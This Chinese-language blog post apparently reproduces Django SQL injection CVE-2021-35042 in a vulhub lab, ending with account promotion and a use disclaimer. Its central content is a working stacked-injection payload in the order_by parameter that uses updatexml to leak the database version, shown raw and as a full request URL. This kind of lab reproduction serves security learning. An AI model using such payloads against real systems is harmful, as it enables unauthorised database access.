前言:
Django在2021年7月1日发布了一个安全更新,修复了在QuerySet底下的order_by函数中存在的SQL注入漏洞。
正文:
这里使用vulhub,不会的可以参考前文,选择目录然后启动:
使用启动命令启动,然后我们访问一下
你的ip:8000/vuln/?order=1
我们构造一下order=-id,这样会产生id降序的结果
这里可以使用堆叠注入来完成。
我们构造语句:
?order=vuln_collection.name);select updatexml(1, concat(0x7e,(select @@version)),1)%23
提交,其中vuln_collection是vuln应用下的模型Collection,这里语句是出现版本号。
http://192.168.119.136:8000/vuln/?order=vuln_collection.name);select%20updatexml(1,%20concat(0x7e,(select%20@@version)),1)%23
这里成功出现,完成注入。
近期公众号运营时间会比较紧,作为个人公众号忙的时候就会发文较少,请大家见谅,可能会发一些比较简单的学习教程来填补空缺。大家多关注公众号的最新推文哦。
扫描二维码关注我们吧!
微信公众号:白安全组
qq群:70844080
网址:www.wangehacker.cn
原文始发于微信公众号(白安全组):Django SQL注入漏洞(CVE-2021-35042)快速复现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论